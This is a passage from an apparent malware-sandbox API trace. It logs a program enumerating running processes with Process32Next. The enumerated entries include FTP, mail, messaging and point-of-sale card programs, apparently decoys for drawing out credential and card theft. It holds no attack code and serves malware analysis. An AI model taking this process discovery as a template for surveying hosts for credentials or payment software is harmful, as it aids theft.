hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0268.050] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0268.051] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0268.053] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0268.054] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0268.055] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0268.057] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0268.061] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0268.062] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0268.064] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0268.065] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0268.067] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0268.068] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0268.070] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0268.071] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0268.072] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0268.184] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0268.186] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0268.187] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0268.189] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0268.190] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0268.192] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0268.193] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0268.194] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0268.196] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0268.197] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0268.203] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0268.206] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0268.208] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0268.209] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0268.211] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0268.212] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0268.214] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0268.218] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0268.219] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0268.224] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0268.225] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0268.227] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0268.229] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0268.233] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0268.234] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0268.236] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0268.237] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0268.239] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0268.240] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0268.242] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0268.243] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0268.245] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0268.249] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0268.250] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0268.252] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0268.253] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0268.255] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0268.257] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0268.258] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0268.259] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0268.355] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0268.357] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0268.359] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0268.361] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0268.362] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0268.364] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0268.366] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0268.368] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0268.424] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0268.426] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0268.428] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0268.430] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0268.432] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0268.436] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0268.438] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0268.440] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0268.441] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0268.464] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0268.466] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0268.467] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0268.469] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0268.471] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0268.473] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0268.475] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0268.476] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0268.478] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0268.483] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0268.485] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0268.487] 